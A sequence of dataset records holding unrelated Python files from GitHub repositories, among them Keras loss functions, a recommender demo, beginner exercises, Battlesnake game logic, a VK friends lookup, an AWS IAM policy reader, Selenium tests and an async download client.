* intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n\ndef dice_coef_2(y_true, y_pred):\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n return (2. * intersection + smooth) / (K.sum(K.square(y_true_f)) + K.sum(K.square(y_pred_f)) + smooth)\n\n\ndef dice_coef_loss(y_true, y_pred):\n return 1 - dice_coef(y_true, y_pred)\n\ndef dice_coef_loss_2(y_true, y_pred):\n return 1 - dice_coef_2(y_true, y_pred)\n\nimport keras.losses\nkeras.losses.dice_coef_loss=dice_coef_loss\nkeras.losses.dice_coef_loss_2=dice_coef_loss_2\n\nimport keras.metrics\nkeras.metrics.dice_coef=dice_coef\nkeras.metrics.dice_coef_2=dice_coef_2\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"karinaaq/PINV15177","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20549322852","text":"from itertools import islice\n\nimport numpy as np\nimport pandas as pd\n\nfrom diyrex.algo import get_items_from_user\nfrom diyrex.data import load, stats\nfrom diyrex import ratings, preview\nfrom diyrex.matrix import table_to_sparse_matrix\n\nnp.random.seed(123)\n\n# %%\n\"\"\"\n## Load signals\n\"\"\"\nsignals = load('data/listenbrainz/parsed/data.csv', ['date','user','item'])\n\nprint(\"\\nsignals:\")\nstats(signals)\nsignals\n\n# %%\n\"\"\"\n## Convert to ratings\n\"\"\"\n\nratings = ratings.compute_implicit_ratings(signals)\nprint(\"\\nratings:\")\nstats(ratings)\nratings\n\n# %%\n\"\"\"\n## Convert to matrix\n\"\"\"\n\nR, users, items = table_to_sparse_matrix(ratings, 'user', 'item', 'rating')\nR\n\n# %%\n\n#do some checks\nuser, item, rating = ratings[ratings.item=='Metallica'].sample(1).iloc[0]\ni = users.index(user)\nj = items.index(item)\n\nassert items[j] == \"Metallica\"\n\nassert R[i,j] == np.float32(rating)\n\n# %%\n\"\"\"\n## Most popular\n\"\"\"\n\nfrom diyrex.algo.popular import most_highly_rated, most_popular\n\npreview((items.index(item) for item in most_highly_rated(ratings)), items, title=\"Top ratings for everyone\")\npreview((items.index(item) for item in most_popular(ratings)), items, title=\"Most popular\")\n\n\n# %%\n\"\"\"\n## Personalized recs\n\"\"\"\n\npreview(get_items_from_user(i, R), items, n=10, title=f\"Top rated items for '{users[i]}'\")\n\n\n# %%\n\"\"\"\n## User-user collaborative filtering\n\"\"\"\n\nfrom diyrex.algo.collaborative import recommend_user_user_cf\n\npreview(recommend_user_user_cf(i, R), items, title=f\"User-User CF for '{users[i]}'\")\n\n\n# %%\n\"\"\"\n## Related items\n\"\"\"\nfrom diyrex.algo.collaborative import related\n\npreview(related(j, R), items, title=f\"Items related to '{items[j]}'\")\n\n\n\n# %%\n\"\"\"\n## Item-item collaborative filtering\n\"\"\"\n\nfrom diyrex.algo.collaborative import recommend_item_item_cf\n\npreview(recommend_item_item_cf(i, R), items, title=f\"Item-Item CF for user '{users[i]}'\")\n\n\n\n# %%\n\"\"\"\n## Content based\n\"\"\"\n\ncontent = load('data/listenbrainz/parsed/content.csv', ['item','feature','value'])\n\n# item category codes must be the same so the matrices are aligned\ncontent['item'].cat.reorder_categories(items, inplace=True)\n\nassert all(content.item.cat.categories == signals.item.cat.categories)\n\nI,features, items2 = table_to_sparse_matrix(content, 'feature', 'item', 'value')\n\nassert items == items2\n\nfrom diyrex.algo.content import similar, recommend_content_based\n\npreview(similar(i,I),items,title=f\"Similar to item: 
{items[j]}\")\npreview(recommend_content_based(i,R, I),items,title=f\"Content-based recs for user: {users[i]}\")\n\n\n\n# %%\n\"\"\"\n## Efficient item-item collaborative filtering\n\"\"\"\n\nfrom diyrex.algo.efficient import self_similarity_matrix, recommend_with_S\n\nS = self_similarity_matrix(R.T)\npreview(recommend_with_S(i, R, S), items, title=f\"Efficient Item-Item CF for user '{users[i]}'\")\n","repo_name":"jotinha/diy-rex","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"274693429","text":"def caesar_cipher(text, shift):\n result = \"\"\n for char in text:\n if char.isalpha():\n base = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - base + shift) % 26 + base)\n else:\n result += char\n return result\n\ndef count_fruit_occurrences(fruit_tuple, target_fruit):\n return fruit_tuple.count(target_fruit)\n\ndef count_partial_fruit_occurrences(fruit_tuple, partial_fruit):\n count = 0\n for fruit in fruit_tuple:\n count += fruit.count(partial_fruit)\n return count\n\ndef replace_manufacturer(car_tuple, old_manufacturer, new_word):\n return tuple([new_word if manuf == old_manufacturer else manuf for manuf in car_tuple])\n\n# 1\nshift = int(input(\"Введите сдвиг шифрования (целое число): \"))\ninput_text = input(\"Введите текст для шифрования: \")\nencrypted_text = caesar_cipher(input_text, shift)\nprint(\"Зашифрованный текст:\", encrypted_text)\n\n# 2\nfruits = ('apple', 'banana', 'mango', 'banana', 'strawberry-banana')\ntarget_fruit = input(\"Введите название фрукта для подсчета: \")\noccurrences = count_fruit_occurrences(fruits, target_fruit)\nprint(f\"Количество раз, когда {target_fruit} встречается в кортеже:\", occurrences)\n\n# 3\npartial_fruit = input(\"Введите часть названия фрукта для подсчета: \")\npartial_occurrences = count_partial_fruit_occurrences(fruits, partial_fruit)\nprint(f\"Количество раз, когда {partial_fruit} является частью элемента кортежа:\", partial_occurrences)\n\n# 4\nmanufacturers = ('Toyota', 'Ford', 'Chevrolet', 'Toyota', 'Honda', 'Toyota')\nold_manufacturer = input(\"Введите название производителя для замены: \")\nnew_word = input(\"Введите слово для замены: \")\nnew_manufacturers = replace_manufacturer(manufacturers, old_manufacturer, new_word)\nprint(\"Новый кортеж с замененными производителями:\", new_manufacturers)\n\n\n\n\ndef superset(set1, set2):\n if set1 == set2:\n print(\"Множества равны\")\n elif set1.issuperset(set2):\n print(f\"Объект {set1} является чистым супермножеством\")\n else:\n print(\"Супермножество не обнаружено\")\n\nset_a = {1, 2, 3, 4, 5}\nset_b = {3, 4}\n\nsuperset(set_a, set_b)\n\n\n\nclass EnglishFrenchDictionary:\n def __init__(self):\n self.dictionary = {}\n\n def add_word(self, english_word, french_translation):\n self.dictionary[english_word] = french_translation\n print(f'Слово \"{english_word}\" добавлено в словарь с переводом \"{french_translation}\".')\n\n def delete_word(self, english_word):\n if english_word in self.dictionary:\n del self.dictionary[english_word]\n print(f'Слово \"{english_word}\" удалено из словаря.')\n else:\n print(f'Слово \"{english_word}\" не найдено в словаре.')\n\n def search_translation(self, english_word):\n if english_word in self.dictionary:\n print(f'Перевод слова \"{english_word}\": {self.dictionary[english_word]}')\n else:\n print(f'Слово \"{english_word}\" не найдено в словаре.')\n\n def update_translation(self, english_word, 
new_french_translation):\n if english_word in self.dictionary:\n self.dictionary[english_word] = new_french_translation\n print(f'Перевод для слова \"{english_word}\" обновлен на \"{new_french_translation}\".')\n else:\n print(f'Слово \"{english_word}\" не найдено в словаре.')\n\n def display_dictionary(self):\n print(\"Содержимое словаря:\")\n for english_word, french_translation in self.dictionary.items():\n print(f'{english_word} - {french_translation}')\n\n\ndictionary = EnglishFrenchDictionary()\n\ndictionary.add_word(\"hello\", \"bonjour\")\ndictionary.add_word(\"world\", \"monde\")\n\ndictionary.display_dictionary()\n\ndictionary.search_translation(\"hello\")\ndictionary.search_translation(\"goodbye\")\n\ndictionary.update_translation(\"hello\", \"salut\")\n\ndictionary.display_dictionary()\n\ndictionary.delete_word(\"world\")\n\ndictionary.display_dictionary()\n\n\n\n\n\ndef set_gen(numbers):\n result_set = set()\n\n for number in numbers:\n if numbers.count(number) > 1:\n result_set.add(str(number) * numbers.count(number))\n else:\n result_set.add(number)\n\n return result_set\n\ninput_numbers = [1, 2, 3, 4, 4, 4, 5, 6, 6, 6, 6]\nresult_set = set_gen(input_numbers)\n\nprint(\"Исходный список:\", input_numbers)\nprint(\"Множество с учетом условий:\", result_set)\n\n","repo_name":"Artutev/15.06.23","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13858077010","text":"import copy\n\ndef avoid_my_neck_and_walls(my_head, my_body, snakes, possible_moves):\n my_neck = my_body[1] # The segment of body right after the head is the 'neck'\n\n if my_neck[\"x\"] < my_head[\"x\"]: # my neck is left of my head\n possible_moves.remove(\"left\")\n elif my_neck[\"x\"] > my_head[\"x\"]: # my neck is right of my head\n possible_moves.remove(\"right\")\n elif my_neck[\"y\"] < my_head[\"y\"]: # my neck is below my head\n possible_moves.remove(\"down\")\n elif my_neck[\"y\"] > my_head[\"y\"]: # my neck is above my head\n possible_moves.remove(\"up\")\n \n if my_head[\"x\"] == 10:\n possible_moves.remove(\"right\")\n elif my_head[\"x\"] == 0:\n possible_moves.remove(\"left\")\n\n# if {\"x\": my_head[\"x\"], \"y\": my_head[\"y\"]} in my_body:\n \n if my_head[\"y\"] == 10:\n possible_moves.remove(\"up\")\n elif my_head[\"y\"] == 0:\n possible_moves.remove(\"down\")\n\n # for i in range()\n\n return possible_moves\n\n\ndef avoid_snakes(my_head, snakes, possible_moves, length):\n grid = [\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ]\n\n # Create grid\n for snakeIndex in range(len(snakes)):\n for bodyIndex in range(len(snakes[snakeIndex][\"body\"])-1):\n # Adds every part except the tail\n grid[snakes[snakeIndex][\"body\"][bodyIndex][\"y\"]][snakes[snakeIndex][\"body\"][bodyIndex][\"x\"]] = 1\n\n # Adds the possible ways a snake head could move if it has more health\n if snakes[snakeIndex][\"body\"][0] != my_head and snakes[snakeIndex][\"length\"] >= length:\n if snakes[snakeIndex][\"body\"][0][\"x\"] - 1 >= 0:\n grid[snakes[snakeIndex][\"body\"][0][\"y\"]][snakes[snakeIndex][\"body\"][0][\"x\"]-1] = 1\n if 
snakes[snakeIndex][\"body\"][0][\"x\"] + 1 <= 10:\n grid[snakes[snakeIndex][\"body\"][0][\"y\"]][snakes[snakeIndex][\"body\"][0][\"x\"]+1] = 1\n if snakes[snakeIndex][\"body\"][0][\"y\"] - 1 >= 0:\n grid[snakes[snakeIndex][\"body\"][0][\"y\"]-1][snakes[snakeIndex][\"body\"][0][\"x\"]] = 1\n if snakes[snakeIndex][\"body\"][0][\"y\"] + 1 <= 10:\n grid[snakes[snakeIndex][\"body\"][0][\"y\"]+1][snakes[snakeIndex][\"body\"][0][\"x\"]] = 1\n\n # Remove killing moves using grid\n if \"up\" in possible_moves and grid[my_head[\"y\"]+1][my_head[\"x\"]] == 1:\n possible_moves.remove(\"up\")\n if \"down\" in possible_moves and grid[my_head[\"y\"]-1][my_head[\"x\"]] == 1:\n possible_moves.remove(\"down\")\n if \"left\" in possible_moves and grid[my_head[\"y\"]][my_head[\"x\"]-1] == 1:\n possible_moves.remove(\"left\")\n if \"right\" in possible_moves and grid[my_head[\"y\"]][my_head[\"x\"]+1] == 1:\n possible_moves.remove(\"right\")\n \n return possible_moves\n \n # if {\"x\": my_head[\"x\"], \"y\": my_head[\"y\"]} in my_body:\n # my_body.remove({\"x\": my_head[\"x\"], \"y\": my_head[\"y\"]})\n\n\n\ndef find_food(my_head, food, possible_moves):\n closestFood = {\"x\": 5, \"y\": 5}\n closestDist = 50\n \n for i in range(len(food)):\n dist = abs(my_head[\"x\"] - food[i][\"x\"]) + abs(my_head[\"y\"] - food[i][\"y\"])\n #print(dist, closestDist)\n if dist < closestDist:\n closestDist = dist\n closestFood = food[i]\n \n xDiff = abs(my_head[\"x\"] - closestFood[\"x\"])\n yDiff = abs(my_head[\"y\"] - closestFood[\"y\"])\n\n execute = True\n if xDiff > yDiff:\n execute = False\n if my_head[\"x\"] > closestFood[\"x\"]:\n choice = \"left\"\n else:\n choice = \"right\"\n \n if choice not in possible_moves:\n execute = True\n\n if execute:\n if my_head[\"y\"] > closestFood[\"y\"]:\n choice = \"down\"\n else:\n choice = \"up\"\n \n if choice not in possible_moves:\n return possible_moves[0]\n \n return choice\n\ndef simulate_move(my_head, my_body, snakes, food, length):\n try:\n possible_moves = list([\"up\", \"down\", \"left\", \"right\"])\n possible_moves = avoid_my_neck_and_walls(my_head, my_body, snakes, possible_moves)\n possible_moves = avoid_snakes(my_head, snakes, possible_moves, length)\n move = find_food(my_head, food, possible_moves)\n except:\n return \"dead\"\n\n if len(possible_moves) == 0:\n move = \"dead\"\n \n return move\n\ndef simulate_future(possible_moves, data):\n not_possible_moves = list([])\n dataOrigin = copy.deepcopy(data)\n for myMove in ((possible_moves)):\n data = copy.deepcopy(dataOrigin)\n for turnIndex in range(10): # num turns ahead\n snakeIndex = 0\n dataHolder = copy.deepcopy(data)\n shouldBreak = False\n for asdf in range(len(data[\"board\"][\"snakes\"])):\n \n if (data[\"board\"][\"snakes\"][snakeIndex][\"id\"] == data[\"you\"][\"id\"] and turnIndex == 0):\n move = myMove\n else:\n move = simulate_move(dataHolder[\"board\"][\"snakes\"][snakeIndex][\"head\"], dataHolder[\"board\"][\"snakes\"][snakeIndex][\"body\"], dataHolder[\"board\"][\"snakes\"], dataHolder[\"board\"][\"food\"], dataHolder[\"board\"][\"snakes\"][snakeIndex][\"length\"])\n\n #print(move, data[\"turn\"])\n if move == \"dead\":\n if data[\"board\"][\"snakes\"][snakeIndex][\"id\"] == data[\"you\"][\"id\"]:\n not_possible_moves.append([myMove, turnIndex])\n shouldBreak = True\n break\n \n del data[\"board\"][\"snakes\"][snakeIndex]\n snakeIndex -= 1\n\n # moves the head\n elif move == \"up\":\n data[\"board\"][\"snakes\"][snakeIndex][\"head\"][\"y\"] += 1\n\n elif move == \"right\":\n 
data[\"board\"][\"snakes\"][snakeIndex][\"head\"][\"x\"] += 1\n\n elif move == \"down\":\n data[\"board\"][\"snakes\"][snakeIndex][\"head\"][\"y\"] -= 1\n\n elif move == \"left\":\n data[\"board\"][\"snakes\"][snakeIndex][\"head\"][\"x\"] -= 1\n \n # print(data[\"board\"][\"snakes\"])\n # print(data[\"board\"][\"snakes\"], shouldBreak)\n for bodyIndex in range(len(data[\"board\"][\"snakes\"][snakeIndex][\"body\"])-1, 0, -1):\n data[\"board\"][\"snakes\"][snakeIndex][\"body\"][bodyIndex] = data[\"board\"][\"snakes\"][snakeIndex][\"body\"][bodyIndex-1].copy()\n \n data[\"board\"][\"snakes\"][snakeIndex][\"body\"][0] = data[\"board\"][\"snakes\"][snakeIndex][\"head\"].copy()\n \n foodIndex = 0\n for i in range(len(data[\"board\"][\"food\"])):\n if data[\"board\"][\"food\"][foodIndex] == data[\"board\"][\"snakes\"][snakeIndex][\"head\"]:\n del data[\"board\"][\"food\"][foodIndex]\n foodIndex -= 1\n foodIndex += 1\n \n snakeIndex += 1\n # print(\"--------------------\")\n # print(data[\"turn\"], myMove, data[\"board\"][\"snakes\"][0][\"body\"])\n if shouldBreak:\n break\n \n \n # print(data[\"board\"][\"snakes\"][0][\"body\"], data[\"turn\"])\n\n \n # print(possible_moves, not_possible_moves, data[\"turn\"])\n for i in range(len(not_possible_moves)):\n possible_moves.remove(not_possible_moves[i][0])\n \n if len(possible_moves) == 0:\n mostTurns = 0\n for i in range(len(not_possible_moves)):\n if not_possible_moves[i][1] > mostTurns:\n possible_moves = list([])\n possible_moves.append(not_possible_moves[i][0])\n return possible_moves\n \ndef choose_move(data: dict) -> str:\n my_head = data[\"you\"][\"head\"] # A dictionary of x/y coordinates like {\"x\": 0, \"y\": 0}\n my_body = data[\"you\"][\"body\"] # A list of x/y coordinate dictionaries like [ {\"x\": 0, \"y\": 0}, {\"x\": 1, \"y\": 0}, {\"x\": 2, \"y\": 0} ]\n\n snakes = data[\"board\"][\"snakes\"]\n\n\n possible_moves = [\"up\", \"down\", \"left\", \"right\"]\n # direction = helper.handler(data.get('you'), data.get('snakes'), data.get('food'))\n\n # Don't allow your Battlesnake to move back in on it's own neck\n possible_moves = avoid_my_neck_and_walls(my_head, my_body, snakes, possible_moves)\n possible_moves = avoid_snakes(my_head, snakes, possible_moves, data[\"you\"][\"length\"])\n\n if data[\"turn\"] > 4:\n data_copy = copy.deepcopy(data)\n possible_moves = simulate_future(possible_moves, data_copy)\n\n move = find_food(my_head, data[\"board\"][\"food\"], possible_moves)\n\n # print(f\"{data['game']['id']} MOVE {data['turn']}: {move} picked from all valid options in {possible_moves}\")\n # pp.pprint(data)\n\n return move\n","repo_name":"vivekbw/BattleSnake","sub_path":"app/server_logic.py","file_name":"server_logic.py","file_ext":"py","file_size_in_byte":8322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16401619959","text":"# /usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport requests\nimport json\n\nwith open(r'token.txt', 'r', encoding='windows-1251') as f:\n access_token = f.read()\nhelp = 'Для того, чтобы узнать закрытых друзей пользователя, введите его id.\\n' \\\n 'Чтобы выйти из программы, введите \"end\".\\n' \\\n 'Для корректного результата страница пользователя должна существовать и быть открытой.\\n'\n\n\nclass VkApi:\n def __init__(self, access_token):\n self.access_token = access_token\n self.request = \"https://api.vk.com/method/\"\n print('Данная программа позволяет узнать список друзей пользователя ВКонтакте, имеющих закрытый профиль.\\n'\n '(при 
условии, что пользователь существует и имеет открытый профиль)\\n'\n 'Давыдова Влада, КН-201 (МЕН-280206)\\n')\n\n def main(self):\n while True:\n user_id = input(\"Введите id пользователя.\\n\")\n if user_id == \"end\":\n break\n if user_id == \"help\":\n print(help)\n else:\n closed_friends = self.get_closed_friends(user_id)\n for friend in closed_friends:\n print(friend)\n\n def get_friends(self, user_id):\n request = self.request + f\"friends.get?user_id={user_id}&fields=nickname,%20domain&v=5.103&access_token={self.access_token}\"\n r = requests.get(request)\n # print(r.text)\n if 'error' in r.text:\n print('Пользователь удалён или имеет закрытый профиль.')\n return []\n return json.loads(r.text)['response']['items']\n\n def get_closed_friends(self, user_id):\n data = self.get_friends(user_id)\n closed_friends = []\n for user in data:\n if 'is_closed' in user:\n if user['is_closed']:\n closed_friends.append(f'{user[\"first_name\"]} {user[\"last_name\"]}')\n return closed_friends\n\n\nif __name__ == '__main__':\n api = VkApi(access_token)\n api.main()\n","repo_name":"songerman/task8","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9113148418","text":"import mlSandbox\nimport tkinter as Tk\nimport pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom mpl_toolkits import mplot3d\nimport GuiOption\n\nclass CountryGui:\n\n def __init__(self, dataFrame, options, xAxisName):\n countries = list(set(dataFrame.index.values))\n countries.sort()\n\n self.root = Tk.Tk()\n self.root.title(\"Select Country To View Data\")\n self.root.geometry(\"400x300\")\n self.xAxisName = xAxisName\n \n self.pick = Tk.StringVar()\n self.pick.set(countries[0])\n self.optionsMenu = Tk.OptionMenu(self.root, self.pick, *countries)\n self.options = options\n\n self.graphPick = Tk.IntVar()\n self.graphPick.set(1)\n self.radButtons = []\n if self.options:\n for key in self.options:\n self.radButtons.append(Tk.Radiobutton(self.root,text = self.options[key].displayName, variable = self.graphPick, value = key))\n \n self.dataFrame = dataFrame\n self.countryContainer = set([])\n self.buttonFrame = Tk.Frame(self.root)\n self.plotButton = Tk.Button(self.root, text = \"Plot Data\", command = self.plotData)\n self.addButton = Tk.Button(self.buttonFrame, text = \"Add Country\", command = self.addCountry)\n self.clearButton = Tk.Button(self.buttonFrame, text = \"Clear Countries\", command = self.clearCountries)\n self.Label = Tk.Label(self.root, text = \"Countries To Display Below\")\n self.listBox = Tk.Listbox(self.root)\n \n self.optionsMenu.pack()\n self.buttonFrame.pack()\n self.addButton.pack(side = Tk.LEFT)\n self.clearButton.pack(side = Tk.RIGHT)\n for rad in self.radButtons:\n rad.pack()\n self.plotButton.pack()\n self.Label.pack()\n self.listBox.pack()\n \n Tk.mainloop()\n \n def plotData(self):\n fig, ax = plt.subplots()\n \n pickLocal = self.graphPick.get()\n displayName = self.options[pickLocal].displayName\n pandasName = self.options[pickLocal].pandasName\n \n plt.xlabel(self.xAxisName)\n plt.ylabel(displayName)\n plt.title(\"{} vs {}\".format(displayName, self.xAxisName))\n if self.xAxisName == 'date':\n months = mdates.MonthLocator() # every month\n months_fmt = mdates.DateFormatter('%b')\n \n for country in self.countryContainer:\n country = self.dataFrame.loc[country]\n xData = list(country[self.xAxisName])\n yData = 
list(country[pandasName])\n plt.plot(xData, yData, 'o', label = country.index[0])\n if self.xAxisName == 'date':\n ax.xaxis.set_major_locator(months)\n ax.xaxis.set_major_formatter(months_fmt)\n fig.autofmt_xdate()\n \n plt.legend(loc = \"upper left\") \n plt.show()\n\n def addCountry(self):\n pickLocal = self.pick.get()\n if pickLocal not in self.dataFrame.index or pickLocal in self.countryContainer:\n return\n\n self.countryContainer.add(pickLocal)\n self.listBox.insert(Tk.END, pickLocal)\n \n def clearCountries(self):\n self.countryContainer.clear()\n self.listBox.delete(0, Tk.END)","repo_name":"Michael-Paluda/mlSandbox","sub_path":"countryGUI.py","file_name":"countryGUI.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"527609918","text":"from dataclasses import dataclass\nfrom typing import Dict\n\nfrom aws_ptrp.iam.policy import Policy\nfrom aws_ptrp.iam.policy.policy_document import PolicyDocument, PolicyDocumentCtx\nfrom aws_ptrp.utils.pagination import paginate_response_list\nfrom boto3 import Session\nfrom serde import from_dict, serde\n\n\n@serde\n@dataclass\nclass IAMPolicy:\n policy: Policy\n policy_document: PolicyDocument\n\n def __eq__(self, other):\n return self.policy.policy_id == other.policy.policy_id\n\n def __hash__(self):\n return hash(self.policy.policy_id)\n\n def __repr__(self):\n return self.policy.arn\n\n @staticmethod\n def extract_aws_account_id_from_arn_of_iam_entity(arn: str) -> str:\n return arn[arn.find(\":iam::\") + 6 : arn.find(\":policy/\")]\n\n def to_policy_document_ctx(self) -> PolicyDocumentCtx:\n aws_account_id = IAMPolicy.extract_aws_account_id_from_arn_of_iam_entity(self.policy.arn)\n return PolicyDocumentCtx(\n policy_document=self.policy_document,\n policy_name=self.policy.policy_name,\n parent_arn=self.policy.arn,\n parent_aws_account_id=aws_account_id,\n )\n\n\ndef get_iam_policies(session: Session) -> Dict[str, IAMPolicy]:\n iam_client = session.client('iam')\n ret: Dict[str, IAMPolicy] = {}\n\n list_policies = paginate_response_list(iam_client.list_policies, 'Policies', OnlyAttached=True)\n for list_policy_response in list_policies:\n # Due to the comment in the aws API for list_policies we are using the get_policy for each policy\n # \"IAM resource-listing operations return a subset of the available attributes for the resource. For example, this operation does not return tags, even though they are an attribute of the returned object. 
To view all of the information for a customer manged policy, see GetPolicy.\"\n arn = list_policy_response['Arn']\n policy_response = iam_client.get_policy(PolicyArn=arn)['Policy']\n policy: Policy = from_dict(Policy, policy_response) # type: ignore\n\n policy_version_response = iam_client.get_policy_version(PolicyArn=arn, VersionId=policy.default_version_id)\n policy_version_response = policy_version_response['PolicyVersion']['Document']\n policy_document: PolicyDocument = from_dict(PolicyDocument, policy_version_response) # type: ignore\n ret[policy.arn] = IAMPolicy(\n policy=policy,\n policy_document=policy_document,\n )\n return ret\n","repo_name":"SatoriCyber/universal-data-permissions-scanner","sub_path":"universal_data_permissions_scanner/datastores/aws/aws_ptrp_package/aws_ptrp/iam/iam_policies.py","file_name":"iam_policies.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"32157345457","text":"from selenium import webdriver\nfrom Libraries import configRead\nfrom Pages import Bootstrap_Date_picker\nfrom Pages import jQuery_Date_picker\nfrom Assersions import Forms_Assersions\nfrom Pages import Simple_Form_Demo\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.select import Select\nimport time\nimport pytest\nimport datetime\n\ndef test_008_TC_checkboxes1_section_heading(startbrowser):\n driver = startbrowser[0]\n wait = startbrowser[1]\n mouseaction = startbrowser[2]\n driver.find_element_by_xpath(\"//a[contains(text(),'Input Forms')]\").click()\n driver.find_element_by_xpath(\"//a[contains(text(),'Checkbox Demo')]\").click()\n #heading = driver.find_element_by_xpath(\"//div[text()='Single Checkbox Demo']\").text\n #assert heading ==\"Single Checkbox Demo\"\n\ndef test_009_TC_validate_checkbox1(startbrowser):\n driver = startbrowser[0]\n wait = startbrowser[1]\n mouseaction = startbrowser[2]\n driver.find_element_by_xpath(\"//input[@id='isAgeSelected']\").click()\n #status = driver.find_element_by_xpath(\"//input[@id='isAgeSelected']\").is_enabled()\n #assert status == True\n driver.find_element_by_xpath(\"//input[@id='isAgeSelected']\").click()\n\ndef test_010_TC_Multiple_Checkbox_Demo_heading(startbrowser):\n driver = startbrowser[0]\n wait = startbrowser[1]\n mouseaction = startbrowser[2]\n heading = driver.find_element_by_xpath(\"//div[text()='Multiple Checkbox Demo']\").text\n #assert heading ==\"Multiple Checkbox Demo\"\n\ndef test_011_TC_Multiple_checkbox_select(startbrowser):\n driver = startbrowser[0]\n wait = startbrowser[1]\n mouseaction = startbrowser[2]\n driver.find_element_by_xpath(\"//label[text()='Option 1']\").click()\n time.sleep(1)\n driver.find_element_by_xpath(\"//label[text()='Option 2']\").click()\n time.sleep(1)\n driver.find_element_by_xpath(\"//label[text()='Option 3']\").click()\n time.sleep(1)\n driver.find_element_by_xpath(\"//label[text()='Option 4']\").click()\n time.sleep(1)\n attvalue = driver.find_element_by_xpath(\"//input[@id='check1']\").get_attribute(\"value\")\n #assert attvalue == \"Uncheck All\"\n\ndef test_012_TC_uncheck_all_checkbox_click(startbrowser):\n driver = startbrowser[0]\n wait = startbrowser[1]\n mouseaction = startbrowser[2]\n 
driver.find_element_by_xpath(\"//input[@id='check1']\").click()\n checkbox_state = driver.find_element_by_xpath(\"//input[@id='check1']\").get_attribute(\"value\")\n #assert checkbox_state ==\"Check All\"\n\n\n\n\n\n\n\n\n","repo_name":"aashishdalmiapython/Jenkin_SampleProject2","sub_path":"TestCases/test_01_Checkboxes_Suite.py","file_name":"test_01_Checkboxes_Suite.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28507233235","text":"from typing import List, Union\n\nfrom aiodown.types import Download\n\n\nclass Client:\n \"\"\"aiodown Client, where you can remove and/or add files from/in the download list.\n\n Parameters:\n workers (``int``, *optional*):\n Number of workers for each download\n Default to 8.\n \"\"\"\n\n def __init__(self, workers: int = 8):\n self._workers = workers\n self._running = False\n self._downloads = {}\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, *args):\n return None\n\n def add(\n self, url: str, path: str = None, retries: int = 3, workers: int = None\n ) -> Download:\n \"\"\"Adds a file to the download list.\n\n Parameters:\n url (``str``):\n Direct file link.\n\n path (``str``, *optional*):\n File download location.\n\n retries (``int``, *optional*):\n Number of download retries in case of failure.\n\n workers (``int``, *optional*):\n Number of workers for each download.\n Default to 8.\n\n Returns:\n :obj:`aiodown.types.Download`: The download object.\n \"\"\"\n\n if self.is_running():\n raise RuntimeError(\n \"There are some downloads in progress, cancel them first or wait for them to finish\"\n )\n\n dl_id = len(self._downloads.keys())\n dl = Download(url, path, retries, self, workers or self._workers)\n dl._id = dl_id\n self._downloads[dl_id] = dl\n\n return dl\n\n def rem(self, dl_id: Union[bool, int]):\n \"\"\"Removes one or all files from the download list.\n\n Parameters:\n dl_id (``int``, ``True``):\n Removes the download from the list with the specified id,\n if True removes all downloads from the list.\n\n Raises:\n KeyError: In case the dl_id is invalid.\n RuntimeError: In case of have a download in progress.\n TypeError: In case the dl_id is False.\n \"\"\"\n\n if isinstance(dl_id, bool):\n if not dl_id:\n raise TypeError(\n \"You can only use 'client.rem(True)' or 'client.rem(id)' and not 'client.rem(False)'\"\n )\n if self.is_running():\n raise RuntimeError(\n \"There are some downloads in progress, cancel them first or wait for them to finish\"\n )\n else:\n self._downloads = {}\n else:\n if dl_id not in self._downloads.keys():\n raise KeyError(f\"There is no download with id '{dl_id}'\")\n\n if self._downloads[dl_id].is_finished():\n del self._downloads[dl_id]\n else:\n raise RuntimeError(\"The download is in progress, cancel it first\")\n\n async def start(self):\n \"\"\"Starts all downloads in the list.\n\n Raises:\n RuntimeError: In case of have a download in progress.\"\"\"\n\n if self.is_running():\n raise RuntimeError(\"Downloads have already started\")\n\n for _download in self._downloads.values():\n await _download.start()\n\n self._running = True\n\n async def stop(self):\n \"\"\"Stop all downloads in the 